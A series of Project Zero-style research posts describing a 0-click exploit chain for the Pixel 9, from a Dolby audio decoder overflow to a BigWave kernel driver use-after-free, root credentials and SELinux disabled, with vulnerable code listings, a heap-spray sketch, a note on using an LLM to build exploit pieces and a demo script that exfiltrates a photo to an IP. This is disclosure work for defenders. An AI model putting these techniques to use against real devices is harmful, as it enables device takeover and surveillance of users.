This type of diffusion of responsibility isn’t uncommon in vulnerability management. Series of bugs that can be combined to cause severe user harm are often individually deprioritized, and codec vendors like Dolby often consider it largely the platform’s responsibility to mitigate the impact of memory corruption vulnerabilities, while platforms like Android rely too heavily on their supply chain being bug-free. Developers of software with the best security posture tend to take the stance that all external software should be considered compromised, and invest in protecting against this eventuality. This and other defense-in-depth approaches are what make exploit chains difficult for attackers, and have the best chance of protecting users.
Patch Propagation
Even though the Dolby UDC vulnerability was eventually patched by Pixel, it will take some time for all other Android users to receive an update. This is because mobile updates are gated on a variety of factors, including carrier approval, and not every OEM provides security updates in a timely manner, if at all.
Android has a mechanism, called APEX, for updating specific system libraries in a way that circumvents this process. Libraries packaged with APEX can be updated by Google directly through the Google Play Store, leading to a much faster update cycle. Since the UDC does not ship as part of Android, it does not have this capability, though this could be changed with significant licensing and shipping ownership changes.
Conclusion
It’s easy to look at a 0-click exploit chain like the one we developed and see a unique technical feat, when what it really reveals is capabilities currently available to many attackers. While developing the exploit was time-consuming, and required certain technical knowledge, it involved nothing that isn’t achievable with sufficient investment. All considered, we were surprised by how small that investment turned out to be.
It can also be tempting to see this exploit as a series of esoteric, difficult-to-detect errors, but there are actions that can reduce the risk of such exploits, including analysis and reduction of 0-click attack surface, consistent testing of security mitigations, rapid patching and investment in memory mitigations.
Most humans alive today trust their privacy, financial well-being and sometimes personal safety to a mobile device. Many measures are available that could protect them against the most dangerous adversaries. Vendors should take action to reduce the risk of memory-corruption vulnerabilities to the platform and deliver security patches to users in a reasonable timeframe.
-
🔗 Project Zero A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave rss
With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the
mediacodec context. As per the AOSP documentation, the mediacodec SELinux context is intended to be a constrained (a.k.a. sandboxed) context where non-secure software decoders are utilized. Nevertheless, using my DriverCartographer tool, I discovered an interesting device driver, /dev/bigwave, that was accessible from the mediacodec SELinux context. BigWave is hardware present on the Pixel SOC that accelerates AV1 decoding tasks, which explains why it is accessible from the mediacodec context. As previous research has copiously affirmed, Android drivers for hardware devices are prime places to find powerful local privilege escalation bugs. The BigWave driver was no exception - across a couple hours of auditing the code, I discovered three separate bugs, including one that was powerful enough to escape the mediacodec sandbox and get kernel arbitrary read/write on the Pixel 9.

The (Very Short) Bug Hunt
The first bug I found was a duplicate that was originally reported in February of 2024 but remained unfixed at the time of re-discovery in June of 2025, over a year later, despite the bugfix being a transposition of two lines of code. The second bug presented a really fascinating bug-class that is analogous to the double-free kmalloc exploitation primitive - but with a different linked list entirely. However it was the third bug I discovered that created the nicest exploitation primitive. Fixes were made available for all three bugs on January 5, 2026.
The Nicest Bug
Every time the
/dev/bigwave device is opened, the driver allocates a new kernel struct called inst which is stored in the private_data field of the fd. Within the inst is a sub-struct called job, which tracks the register values and status associated with an individual invocation of the BigWave hardware to perform a task. In order to submit some work to the bigo hardware, a process uses the ioctl BIGO_IOCX_PROCESS, which fetches Bigwave register values from the ioctl caller in AP userland, and places the job on a queue that gets picked up and used by a separate thread, the bigo worker thread. That means that an object whose lifetime is inherently bound to a file descriptor is transiently accessed on a separate kernel thread that isn't explicitly synced to the existence of that file descriptor.

During BIGO_IOCX_PROCESS ioctl handling, after submitting a job to get executed on bigo_worker_thread, the ioctl call enters wait_for_completion_timeout with a timeout of 16 seconds waiting for bigo_worker_thread to complete the job. After those 16 seconds, if bigo_worker_thread has not signaled job completion, the timeout period ends and the ioctl dequeues the job from the priority queue. However, if a sufficient number of previous jobs were stacked onto the bigo_worker_thread, it is possible that bigo_worker_thread was so delayed that it has only just dequeued and is concurrently processing the very job that the ioctl has considered to have timed out and is trying to dequeue. The syscall context in this case simply returns back to userland, and if at this point userland closes the fd associated with the BigWave instance, the inst (and thus the job) is destroyed while bigo_worker_thread continues to reference the job.

Accesses to the UAF'd object are marked in the listing below:
```c
static int bigo_worker_thread(void *data)
{
    ...
    while (1) {
        rc = wait_event_timeout(core->worker,
                                dequeue_prioq(core, &job, &should_stop),
                                msecs_to_jiffies(BIGO_IDLE_TIMEOUT_MS)); // The job is fetched from the queue
        ...
        inst = container_of(job, struct bigo_inst, job); // The job is an inline struct inside of the inst which gets UAF'd
        ...
        rc = bigo_run_job(core, job);
        ...
        job->status = rc;            /* UAF'd object access */
        complete(&inst->job_comp);   /* UAF'd object access */
    }
    return 0;
}
...
static int bigo_run_job(struct bigo_core *core, struct bigo_job *job)
{
    ...
    inst = container_of(job, struct bigo_inst, job);
    bigo_bypass_ssmt_pid(core, inst->is_decoder_usage);
    bigo_push_regs(core, job->regs); // The register values of the bigwave processor are set (defined by userland)
    bigo_core_enable(core);
    ret = wait_for_completion_timeout(&core->frame_done,
                                      msecs_to_jiffies(core->debugfs.timeout)); // pause for 1 second
    ...
    // At this point inst/job have been freed
    bigo_pull_regs(core, job->regs);               /* UAF'd object access: a pointer is taken directly from the freed object */
    *(u32 *)(job->regs + BIGO_REG_STAT) = status;  /* UAF'd object access */
    if (rc || ret)
        rc = -ETIMEDOUT;
    return rc;
}

void bigo_pull_regs(struct bigo_core *core, void *regs)
{
    memcpy_fromio(regs, core->base, core->regs_size); // And the current register values of the bigwave processor are written to that location
}
```

By spraying attacker-controlled
kmalloc allocations (for example via Unix Domain Socket messages) we can control the underlying UAF pointer job->regs, so we can control the destination of our write. Additionally, since we set the registers at the beginning of execution, by setting the registers in such a way that the BigWave processor does not execute at all, we can ensure that the end register state is nearly identical to the original register state - hence we can control what is written as well. And just like that, we have a half decent 2144-byte arbitrary write! And all without leaking the KASLR slide!
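For readers unfamiliar with the technique, a Unix-domain-socket kmalloc spray generally looks something like the following minimal sketch. This is an illustration, not the exploit's actual code: the message size and count are placeholders that would have to be tuned so the kernel's socket buffer lands in the same slab as the freed inst.

```c
/* Minimal sketch of a Unix-domain-socket kmalloc spray (illustrative only).
 * Each unread datagram keeps a kernel allocation alive whose contents are
 * the message bytes, so sending many messages of a suitable size can
 * reclaim a just-freed object with attacker-chosen data. */
#include <string.h>
#include <sys/socket.h>

#define SPRAY_MSG_SIZE 512   /* placeholder: tuned to the target object's kmalloc bucket */
#define SPRAY_COUNT    512   /* placeholder: enough messages to reliably reclaim the slot */

static int spray_socks[SPRAY_COUNT][2];

static void spray_kmalloc(const void *payload, size_t len)
{
    char msg[SPRAY_MSG_SIZE] = {0};

    memcpy(msg, payload, len < sizeof(msg) ? len : sizeof(msg));
    for (int i = 0; i < SPRAY_COUNT; i++) {
        /* a datagram socketpair whose messages are never read back */
        socketpair(AF_UNIX, SOCK_DGRAM, 0, spray_socks[i]);
        send(spray_socks[i][0], msg, sizeof(msg), 0);
    }
}
```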
Defeating KASLR (by doing nothing at all)
Exploiting this issue with KASLR enabled would normally involve reallocating some other object over the bigo
inst with a pointer at the location of inst->job.regs, leading to memory corruption of the object pointed to by that overlapped pointer. That would require finding some allocatable object with a pointer at that location, and also finding a way to take advantage of being able to overwrite the sub-object. Finding such an object is difficult but not impossible, especially if you consider cross-cache attacks. It is, however, quite tedious and is not really my idea of a fun time. Thankfully I found a much simpler strategy which essentially allows the generic bypass of KASLR on Pixel in its entirety, the details of which you can read about in my previous blog post. The end-result of that sidequest is the discovery that instead of needing to leak the KASLR base, you can just use 0xffffff8000010000 instead, particularly when it comes to overwriting .data in the kernel. This dramatically simplifies the exploit, and substantially improves the exploit's potential reliability.

Creating an arbitrary read/write
At this point, I have a mostly-arbitrary write primitive anywhere in kernel .data - I have an aliased location for, and can modify, any kernel globals I want. However the
complete call at the end of the bigo_worker_thread job execution loop serves to complicate exploitation a little bit. complete calls swake_up_locked which performs a set of list operations on a list_head node inside of the bigo inst:

```c
static inline int list_empty(const struct list_head *head)
{
    return READ_ONCE(head->next) == head;
}

void swake_up_locked(struct swait_queue_head *q) // The q is located at &inst->job_comp.wait (so attacker controlled)
{
    struct swait_queue *curr;

    if (list_empty(&q->task_list))
        return;

    curr = list_first_entry(&q->task_list, typeof(*curr), task_list);
    wake_up_process(curr->task);
    list_del_init(&curr->task_list);
}
```

While the first
list_empty call would be the simplest to forge, it would also require knowing the location of the inst in kernel memory as q is an inline struct inside of inst. Unfortunately, our KASLR bypass does not give us this, nor is it particularly easy to acquire, as the inst is in kernel heap, not kernel .data. That means we need to instead forge a valid list entry for the q to point to as well as know the location of a task to pass to wake_up_process(). Finally we need to actually forge enough of a list to survive a list_del_init on an entry in the q->task_list, which involves list nodes, and second list nodes that point to the first list node. This might sound quite difficult to forge given the limitation we've previously noted about our KASLR bypass, but in fact, it's not so bad, since our arbitrary write has already happened by this point - so we know the location of memory that we control somewhere in kernel .data. This means we can forge arbitrary list nodes within that space in .data, and we can place pointers to those future forged list nodes in the original heap spray we use to replace the inst. We ALSO know the location of a single task struct in the kernel virtual address space - the init task! init's task struct is in the kernel .data, so we can reference it through the linear map. A spurious wake_up_process on the init_task will be entirely inconsequential while avoiding a crash. You can see the code to set up these linked list nodes in setup_linked_list in the exploit.

With that roadblock resolved, it's time to figure out what in .data to target with our arbitrary write. Our goal is to change our unreliable arbitrary write of 2144 bytes to a reliable arbitrary read/write that causes significantly less collateral damage to the memory around it. I decided to try reimplementing the strategy I reversed from an ITW exploit a couple years ago. This technique involves creating a type-confusion by replacing some of the VFS/fops handlers in the
ashmem_misc data structure with other VFS handlers for other file types. In fact, because of CFI you cannot replace the handler function pointers with pointers to just any location in the kernel .text. You must replace the VFS handlers with other VFS handlers. Rather conveniently however, I can use configfs VFS handlers for my exploit, just like the ITW exploit. The final layout of the fops table and private_data of the struct file look like this:
The fops handlers in green will access the
private_datastructure as astructashmem_area, orasma, while the fops handlers in yellow access the sameprivate_datastructure as aconfigfsbuffer. For theconfigfsfops handlers, the memory pointed to bypagewill be accessed - that is where we will want our arbitrary read/write to read or write. We will set our target using theASHMEM_SET_NAMEioctl.One additional complication however, is that the linear mapping of the kernel .text is not executable, so I can’t use .text region linear map addresses to the VFS handlers when forging my
ashmem_miscdata structure. In practice, it’s not particularly difficult to leak the actual KASLR slide. Before targetingashmem_misc, I first use my arbitrary write to target thesel_fs_typeobject in the kernel .data. This structure has a string, name, that is printed when reading/proc/self/mounts. By replacing that string pointer using my arbitrary write, and then reading/proc/self/mounts, I can turn my unreliable arbitrary write into an arbitrary read instead! Using this arbitrary read, I can read theashmem_fopsstructure (also through the linear map) which gives me pointers at an offset from the kernel base, allowing me to calculate the KASLR slide.I then perform my arbitrary write again to overwrite the
ashmem_miscstructure with a pointer to a new forgedashmem_fopstable that I construct at the same time - such is the perk of overwriting far more data than I need.However, the astute among you may have realized that this massive 2144 byte arbitrary write has a major drawback too, as such a large write will clobber all of the data surrounding whatever I’m actually targeting with the write - this could lead to all sorts of extraneous crashes and kernel panics. In practice, spurious crashing can occur, but the phone is surprisingly quite stable. My experience was that it seemed to crash upon toggling the wifi on/off - but otherwise the phone seems to work mostly fine.
Once the forged
ashmem_miscstructure has been inserted, we now have a perfectly reliable arbitrary read/write, albeit with the phone extraneously crashing sometimes. Upon getting arb read/write, I set SELinux to permissive (just flip the flag in theselinux_statekernel object), fork off a new process, then use my arb read/write to point the new process’s task creds toinit_cred. At this point, I now have a process with root credentials, and SELinux disabled.Integrating into the Dolby exploit
Combining two exploits into one chain requires a fair amount of engineering effort from both exploits. The Dolby exploit will be delivering the Bigwave exploit as a shellcode payload, (patched into the process using
/proc/self/mem) so I need to convert my exploit to work as a binary blob. It also needs to be much smaller than my static compilation environment supported. The lowest hanging fruit was to remove the static libc requirement and have the exploit include wrappers for all the syscalls and libc functions it needs. When I set about to complete this rather tedious task, I realized that this is something an LLM would probably be quite good at. So instead of implementing the sycall wrappers myself, I simply copy-pasted my source code into Gemini and asked it to create the needed header file of syscall wrappers for me. Naturally the AI-generated header file caused many compilation errors (as it surely would have if I had tried to do it too). I took those compilation errors, gave them back to the same Gemini window, and asked it to amend the header file to resolve those errors. The amended header file caused gcc to emit whole new and exciting compilation failures - but the errors looked different than before, so I simply repeated the process. After 4 or 5 attempts, Gemini was able to generate a header file that not only compiled - it worked perfectly. This provides some insight into how attackers might be able to use (or more likely are already using) LLMs to make their exploit process more efficient.This effort results in a much smaller ELF than before (7 KB instead of 500 KB) but just an ELF is not enough - I need the generated blob to work if the dolby exploit simply starts executing from the top of the shellcode. The good news however is that my exploit can operate entirely without a linker - all that is necessary is to prepend a jump to the ELF that sets the PC to the entrypoint. I also include “-mcmodel=tiny -fPIC -pie” in the gcc arguments so that the generated code will work agnostic to the shellcode’s location or alignment in memory.
Finalizing the exploit
For a security researcher, kernel arbitrary read/write is motivation enough to demonstrate the impact of the vulnerability, but it seemed incumbent to create a more accessible demo in order to demonstrate impact more broadly. I added code so that the exploit executed an included shell script, then wrote a shell script that took a picture and sent that picture back to an arbitrary IP address.
In the final part of this blog series, we will discuss what lessons we learned from this research.
-
🔗 Project Zero A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby rss
Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription. Incoming SMS and RCS audio attachments received by Google Messages are now automatically decoded with no user interaction. As a result, audio decoders are now in the 0-click attack surface of most Android phones.
I’ve spent a fair bit of time investigating these decoders, first reporting CVE-2025-49415 in the Monkey’s Audio codec on Samsung devices. Based on this research, the team reviewed the Dolby Unified Decoder, and Ivan Fratric and I reported CVE-2025-54957. This vulnerability is likely in the 0-click attack surface of most Android devices in use today. In parallel, Seth Jenkins investigated a driver accessible from the sandbox the decoder runs in on a Pixel 9, and reported CVE-2025-36934.
As I’ve shared this research, vendors as well as members of the security community have questioned whether such vulnerabilities are exploitable, as well as whether 0-click exploits are possible for all but the most well-resourced attackers in the modern Android security environment. We were also asked whether code execution in the context of a media decoder is practically useful to an attacker and how platforms can reduce the risks such a capability presents to users.
To answer these questions, Project Zero wrote a 0-click exploit chain targeting the Pixel 9. We hope this research will help defenders better understand how these attacks work in the wild, the strengths and weaknesses of Android’s security features with regards to preventing such attacks, and the importance of remediating media and driver vulnerabilities on mobile devices.
The exploit will be detailed in three blog posts.
Part 1 of this series will describe how we exploited CVE-2025-54957 to gain arbitrary code execution in the mediacodec context of a Google Pixel 9.
Part 2 of this series will describe how we exploited CVE-2025-36934 to escalate privileges from mediacodec to kernel on this device.
Part 3 will discuss lessons learned and recommendations for preventing similar exploits on mobile devices.
The vulnerabilities discussed in these posts were fixed as of January 5, 2026.
The Dolby Unified Decoder
The Dolby Unified Decoder component (UDC) is a library that provides support for the Dolby Digital (DD) and Dolby Digital Plus (DD+) audio formats. These formats are also known as AC-3 and EAC-3 respectively. A public specification is available for these formats. The UDC is integrated into a variety of hardware and platforms, including Android, iOS, Windows and media streaming devices. It is shipped to most OEMs as a binary ‘blob’ with limited symbols, which is then statically linked into a shared library. On the Pixel 9, the UDC is integrated into
/vendor/lib64/libcodec2_soft_ddpdec.so.

The Bug
DD+ audio is processed from a bitstream, which consists of independently decodable syncframes, each representing a series of audio samples. During normal operation, the UDC consecutively decodes each syncframe from the bitstream.
One element of a syncframe is the audio block which, according to the specification, can contain the following fields. A syncframe can contain up to 6 audio blocks.
Syntax | Number of bits
---|---
**skiple**| 1
if(skiple)|
**skipl**| 9
**skipfld**| skipl * 8
}|

This means the decoder can copy up to 0x1FF (skipl) bytes per audio block from the bitstream into a buffer we’ll call the ‘skip buffer’.

The skip buffer contains data in a format called Extensible Metadata Delivery Format (EMDF). This format is synchronized, meaning that the UDC looks for a specific series of bytes in the skip buffer, then processes the data afterwards as EMDF. The EMDF in a single syncframe is called an ‘EMDF container’. This is represented in the specifications as:
Syntax | Number of bits
---|---
emdf_sync(){|
**syncword**| 16
**emdf_container_length**| 16
}|

The EMDF syncword is ‘X8’.
An EMDF container is defined as follows:
Syntax | Number of bits
---|---
emdf_container() {|
**emdf_version**| 2
if (emdf_version == 3) {|
emdf_version += variable_bits(2)|
}|
**key_id**| 3
if (key_id == 7) {|
key_id += variable_bits(3)|
}|
while (**emdf_payload_id** != 0x0) {| 5
if (emdf_payload_id == 0x1F) {|
emdf_payload_id += variable_bits(5)|
}|
}|
emdf_payload_config()|
**emdf_payload_size**| variable_bits(8)
for (i = 0; i < payload_size; i++) {|
**emdf_payload_byte**| 8
}|
emdf_protection()|
}|

variable_bits is defined as:

Syntax | Number of bits
---|---
variable_bits (n_bits) {|
value = 0;|
do {|
value += **read**|n_bits
**read_more**| 1
if (read_more) {|
value <<= n_bits;|
value += (1<<n_bits);|
}|
}|
while (read_more);|
return value|
}|

If you’ve spent time looking for vulnerabilities in this type of specification, a problem might already be apparent. There is no stated limit for the size of emdf_payload_size, while the output of variable_bits could be very large, essentially any numeric value.
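To make the unbounded growth concrete, here is a direct C transcription of the variable_bits() syntax above (my sketch; read_bits stands in for the decoder's bit reader): each iteration with read_more set shifts the running value left by n_bits and adds 1 << n_bits, so a long enough run of read_more bits can produce essentially any 64-bit value.

```c
#include <stdint.h>

/* Stand-in for the decoder's bit reader (assumed to exist elsewhere). */
extern uint64_t read_bits(int n_bits);

/* Transcription of the variable_bits() syntax table above. */
static uint64_t variable_bits(int n_bits)
{
    uint64_t value = 0;
    int read_more;

    do {
        value += read_bits(n_bits);     /* 'read' field */
        read_more = (int)read_bits(1);  /* 'read_more' flag */
        if (read_more) {
            value <<= n_bits;
            value += (uint64_t)1 << n_bits;
        }
    } while (read_more);
    return value;
}
```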
emdf_payload_size, meanwhile the output ofvariable_bitscould be very large, essentially any numeric value.Indeed, this is the root of the problem Ivan Fratric found while analyzing the Android UDC binary. In pseudo-code, it reads the EMDF payload into a custom ‘evo’ heap as follows:
```c
result = read_variable_bits(this, 8, &payload_length);
if ( !result ) {
  if ( evo_heap ) {
    buffer = ddp_udc_int_evo_malloc(evo_heap, payload_length, param.extra_len);
    outstruct.buf = buffer;
    if ( !buffer )
      return 2;
    if ( payload_length ) {
      index = 0;
      while ( !ddp_udc_int_evo_brw_read(this, 8, &byte_read) ) {
        outstruct.buf[index++] = byte_read;
        if ( index >= payload_length )
          goto ERROR;
      }
      return 10;
    }
  }
```

So, memory is allocated, then the bytes of the payload are copied into the allocated memory. How does this allocation work?
```c
void *ddp_udc_int_evo_malloc(heap *heap, size_t alloc_size, size_t extra)
{
  size_t total_size;
  unsigned __int8 *mem;

  total_size = alloc_size + extra;
  if ( alloc_size + extra < alloc_size )
    return 0;
  if ( total_size % 8 )
    total_size += (8 - total_size) % 8;
  if ( total_size > heap->remaining )
    return 0;
  mem = heap->curr_mem;
  heap->remaining -= total_size;
  heap->curr_mem += total_size;
  return mem;
}
```

The evo heap is a single slab, with a single tracking pointer that is incremented when memory is allocated. There is no way to free memory on the evo heap. It is only used to process EMDF payloads for a single syncframe (the specification provides no limit on the number of payloads a syncframe can contain, outside of limits on the size of the skip buffer), and once that frame is processed, the entire evo heap is cleared and re-used for the next frame, with no persistence between syncframes.
While
evo_malloc performs a fair number of length checks on allocations, this check is flawed, as it lacks an integer overflow check:

```c
if ( total_size % 8 )
  total_size += (8 - total_size) % 8;
```

If total allocation size on a 64-bit platform is between 0xFFFFFFFFFFFFFFF9 and 0xFFFFFFFFFFFFFFFF, the value of
total_size will wrap, leading to a small allocation, while the loop that writes to the buffer uses the original payload_length as its bounds.
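As a concrete illustration of the wrap (my arithmetic, using the align-to-8 padding shown above):

```c
#include <stdint.h>
#include <stdio.h>

int main(void)
{
    /* A requested size near UINT64_MAX: the padding needed to reach the
     * next multiple of 8 pushes the 64-bit size past zero. */
    uint64_t total_size = 0xFFFFFFFFFFFFFFF9ULL;

    if (total_size % 8)
        total_size += (8 - total_size) % 8;  /* adds 7, wraps to 0 */

    printf("%llu\n", (unsigned long long)total_size);  /* prints 0: a tiny allocation */
    return 0;
}
```

The copy loop, however, still uses the original huge payload_length as its bound, which is what turns the wrapped allocation into an overflow.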
ddp_udc_int_evo_brw_read, and that function checks read bounds based onemdf_container_length, which is also read from the skip buffer. If the read bounds check fails, the loop exits, and no more data is written to the buffer allocated byevo_malloc. This means that the size of the overflow is controllable, as are the values of the bytes written out of bounds, to the limit of the size ofskipl(0x1FF * 6 audio blocks).This is a powerful primitive that I will refer to as the ‘buffer overrun capability’ of this vulnerability. But if you look closely, this bug also contains a leak.
EMDF content is written to the skip buffer with length
skipl, but the EMDF container also has a size, emdf_container_length. What happens when emdf_container_length is larger than skipl?

```c
if ( skipflde && ... ) {
  int skip_copy_len = 0;
  for ( int block_num = 0; block_num < total_blocks; ++block_num ) {
    if ( skiple ) {
      ...
      for ( skip_copy_len; skip_copy_len < skipl; skip_copy_len++ ) {
        b = read_byte_from_syncframe();
        skip_buffer[skip_copy_len] = b;
      }
    }
  }
  int i = 0;
  for (i = 0; i < skip_copy_len; i+=2 ) {
    int16_t word = skip_buffer[i] | skip_buffer[i+1];
    if ( word == "X8" ) {
      has_syncword = 1;
      break;
    }
  }
  if ( has_syncword ) {
    ...
    emdf_container_length = skip_buffer[i + 1] | ( skip_buffer[i] << 8);
    bit_reader.size = emdf_container_length;
    bit_reader.data = skip_buffer[i + 2];
  }
}
```

So while the skip buffer data is written based on
skipl, the bit reader used to process the EMDF container has its length set to emdf_container_length. This means that EMDF data can be read outside of the initialized skip buffer. I will refer to this as the ‘leak capability’ of this vulnerability going forward.

We didn’t report the leak capability as a separate vulnerability from CVE-2025-54957, as it doesn’t have a security impact independent of the bug. The skip buffer is initialized to all zeros when the decoder starts, and afterwards, only syncframe data (i.e. the contents of the media being processed) is written to it. So in normal circumstances, an attacker couldn’t use the leak capability to leak anything they don’t already know. Only when combined with the buffer overrun capability of the vulnerability does the leak capability become useful.
Decoder Memory Layout
The next step in exploiting this bug was understanding what structures in memory it can overwrite. This required understanding the memory layout of the UDC. The UDC performs a total of four system heap allocations when decoding DD+ audio, all occurring when the decoder is created, before any syncframes are processed. These allocations are freed and re-allocated between processing each media file. This is fairly typical of media decoders, as system heap allocations have non-deterministic timing, which can cause lag when the media is played.
One buffer that is allocated is the ‘static buffer’. This buffer contains a large struct, which supports all the functionality of the decoder. The evo heap is part of this buffer. On Android, the size of the static buffer is 692855. Another buffer that is allocated is the ‘dynamic buffer’. This buffer is used as ‘scratch space’ for a variety of calculations, and is also the location of the skip buffer. It is 85827 bytes long. The other two allocations are for input parameters and output data, and aren’t relevant to this exploit.
The terms ‘static buffer’ and ‘dynamic buffer’ are somewhat confusing, as there are other static and dynamic buffers used by the decoder, and both buffers are dynamically allocated. However, these are the names used by Android when integrating the UDC. Throughout this post, the term ‘static buffer’ will always refer to the 692855-byte buffer allocated by the UDC on initialization, and the term ‘dynamic buffer’ will always refer to the 85827-byte buffer allocated by the UDC on initialization, and no other static or dynamic buffers.
The following diagram shows where the skip buffer and evo heap are located in relation to these buffers:
The evo heap is located at offset 0x61d28 in the static buffer, and immediately afterwards is the pointer used to write to the skip buffer when processing EMDF, which I will call the ‘skip pointer’. It points 0x1000 below the skip buffer, and 0x1000 is added to its value to calculate the address that skip data (skipfld) is written to each time a syncframe is processed.

This means the vulnerability has the potential to overwrite a pointer that is later written to with attacker-controllable content, the skip data of the next syncframe. Unfortunately, this is not as simple as using the buffer overrun capability to overwrite the pointer, as the evo heap is 0x1f08 bytes long, and the maximum value of
skipl is 3066 (0xbfa = 0x1ff * 6 audio blocks), meaning that the value the skip pointer would be overwritten with is not immediately controllable by simply decoding an EMDF payload that contains the bug.

This behavior is demonstrated by the original proof-of-concept attached to CVE-2025-54957. This file causes the buffer overrun to occur, but because the skip pointer is more than 3066 bytes away from the evo heap allocation that is overwritten, data is copied from outside the skip buffer. Since this memory is always zero, the skip pointer is overwritten with 0, and a null pointer crash occurs when the skip data from the next syncframe is written.
To get around this, the buffer overrun needs to be triggered on an evo heap allocation when the heap is partially filled. Fortunately, an EMDF container can contain multiple EMDF payloads, and parsing each payload allocates memory on the evo heap. Analyzing
ddp_udc_int_evo_parse_bitstream, the function that performs this parsing and allocation, shows that the smallest possible payload consumes 19 bits from the skip buffer. Meanwhile, every EMDF payload processed causes 96 bytes to be allocated on the evo heap. This means it would take roughly 99 payloads to fill up the evo heap, which translates to 235 bytes of skip data. This is well within the available skip data space. Using this technique, it was possible to overwrite the skip pointer with a controllable absolute value, then write arbitrary data to it.

Write what where?
While this is a useful primitive, its utility is limited by ASLR, as an attacker would need to know the absolute value of a pointer to write to, which is unlikely in a 0-click context. Another possibility is partially overwriting the skip pointer, for example, 0x7AAAAA00A0 could be overwritten to be 0x7AAAAA1234. Since the skip pointer originally points to the dynamic buffer, this allows most of the dynamic buffer to be overwritten. Unfortunately, the dynamic buffer is only used to store temporary numeric data and does not contain any pointers or other structures that would be helpful for exploitation, but there is one useful aspect of this primitive. Normally, only 3066 bytes of skip data can be written to the skip buffer, but it can allow an attacker to write more.
For example, imagine the following series of syncframes:
- Sets skip pointer to 0x7XXXXX4000
- Writes 3066 bytes of skip data to skip pointer
- Sets skip pointer to 0x7XXXXX3800
- Writes 0x800+ bytes of skip data to skip pointer
Now the length of the available data in the skip buffer is 3066 + 0x800, and this can be chained with more syncframes to write up to 0xFFFF bytes into the dynamic buffer. This isn’t on its own a path to exploitation, but it is a primitive that will become useful later. I will refer to it as WRITE DYNAMIC in future sections.
There is one subtlety that is important to notice. Why does syncframe 3 only move the skip pointer back 0x800 (2048) bytes when it could move it back 3066 bytes? This is because setting the skip pointer overwrites the data in the skip buffer. So syncframe 2 writes 3066 bytes, but syncframe 3 overwrites, for example, 200 bytes of that, then syncframe 4 needs to write 0x800+200 bytes to ‘fix’ the overwritten data. So to accurately write a long buffer to the dynamic buffer, the memory overwritten by each syncframe needs to overlap. But never fear, with enough syncframes, it is possible to fill almost the entire dynamic buffer with attacker controlled data. It is also possible to set the skip pointer to process the written data without modifying it by setting the skip pointer to the start of the data to be processed in one syncframe, then processing a second syncframe with
skipl of 2, which will only write the syncword (‘X8’). The skip data will then be processed based on the emdf_container_length already written.

Regardless, the WRITE DYNAMIC primitive was clearly not sufficient for exploitation, so I decided to take a step back and figure out what memory I could overwrite to gain code execution, even if I didn’t have an immediate strategy for overwriting it. Analyzing the static buffer, I learned that my options were fairly limited. There are only two function pointers in the entire static buffer, called very frequently by the function
DLB_CLqmf_analysisL, at offsets 0x8a410 and 0x8a438. This appears to be the only dynamically allocated memory used by the UDC that contains any function pointers.

Note that 0x8a410 and 0x8a438 are absolutely gargantuan offsets. They are more than 0x20000 bytes from the end of the evo heap, at address 0x63c30. A typical exploitation approach might be to directly overflow the heap to overwrite one of these pointers, but this offset is far too large. Even if the above primitive was used to fill the entire dynamic buffer (writable length 0xFFFF) with EMDF container data, it would still not be enough data to overwrite these pointers.
Extending the evo heap
A different approach was needed, so I revisited the static buffer, looking for other fields I could overflow near the end of the evo_heap. One looked interesting:
The
heap_len is used to set the allocation limit of the evo heap during the processing of each syncframe. If it could be overwritten, it would be possible for the evo heap to allocate memory outside of its original bounds.

This was a very promising possibility, as it had the potential to enable a primitive that would allow relative writes within the static buffer. For example, if I overwrote the heap length with a very large value, then allocated 0x286e8 bytes, since the evo heap starts at offset 0x61d28 and I am able to allocate and write to evo heap memory, would I then be able to write to offset 0x61d28 + 0x286e8 = 0x8a410?

Of course, this is still limited by the available size of the skip data, which is now 0xFFFF due to the WRITE DYNAMIC primitive. But since payloads use skip buffer memory at a ratio of 19 bits to 90 bytes, the function pointer could theoretically be overwritten using 0x286e8 / 90 * 19 / 8 = ~ 0xa000 bytes of skip data, which is smaller than the available 0xFFFF bytes.
Overwriting
heap_len presents a challenge, though, as a write that reaches it will also overwrite the skip pointer, and if the skip pointer is invalid, it will cause a crash before the new value of heap_len is processed. One way to get around this would be to know the absolute value of a writable pointer and include it in the data that overwrites the memory, but without an information leak, this isn’t practical on a Pixel. Another would be if there was a valid pointer in the dynamic buffer, as using the leak capability, it would be possible to embed it in the skip data for a frame and use it for the overwrite, but the dynamic buffer only contains numeric data.

Then I realized that the dynamic buffer does contain pointers. Not in the allocated portion, but in the contiguous metadata included in the allocation by Android’s scudo allocator. Inspecting the dynamic buffer in a debugger, the pointer always has the address format 0x000000XXXXXXX0A0. The offset of 0xa0 leaves space for the heap header.
The heap header of the dynamic buffer is as follows:
The memory between offset 0x00 and 0x50 is unused by the scudo heap because this is a secondary (large) allocation, but unfortunately, there is a guard page before the header, and 0x50 bytes is not enough space for the EMDF container needed to overwrite the skip pointer and heap length, so I investigated ways to increase the unused memory between the guard page and allocation header. I discovered:
- If a secondary allocation is freed, and a chunk that is up to 0x2000 bytes smaller is then allocated, the freed chunk will be reallocated to satisfy the request. More importantly, the heap header will be shifted upwards. For example, if a heap chunk of size 0x17000 is allocated at 0x7f00000000 then freed, and then an allocation of size 0x15000 is made, then the chunk will be reused, but the heap header will now be at 0x7f00002000.
- When a secondary chunk is freed, scudo determines the size entirely based on the “curr chunk len” field shown above
It’s also important to note that the dynamic and static buffers are such large allocations with such unusual sizes that scudo always allocates them in the same location in a specific process, allocating the memory when the decoder is initialized and freeing it when it is uninitialized, as once the chunks are created by the heap, they are the only suitable existing chunks to fulfill an allocation request of that size. (Note that the UDC runs in a separate process from other codecs on Android.)
Putting this all together, it is possible to point the skip pointer to the ‘curr chunk len’ field of the dynamic buffer’s header, then overwrite it, so the chunk’s length is 0x17000 instead of 0x15000. Then, when the decoder is reset (i.e. when a new file is played), the buffer will be reallocated, with an extra 0x2000 bytes of writable space before the heap header. This means the exploit will require decoding multiple files, but that isn’t a problem when exploiting this bug via transcription, as multiple audio attachments to a single message are decoded in sequence.
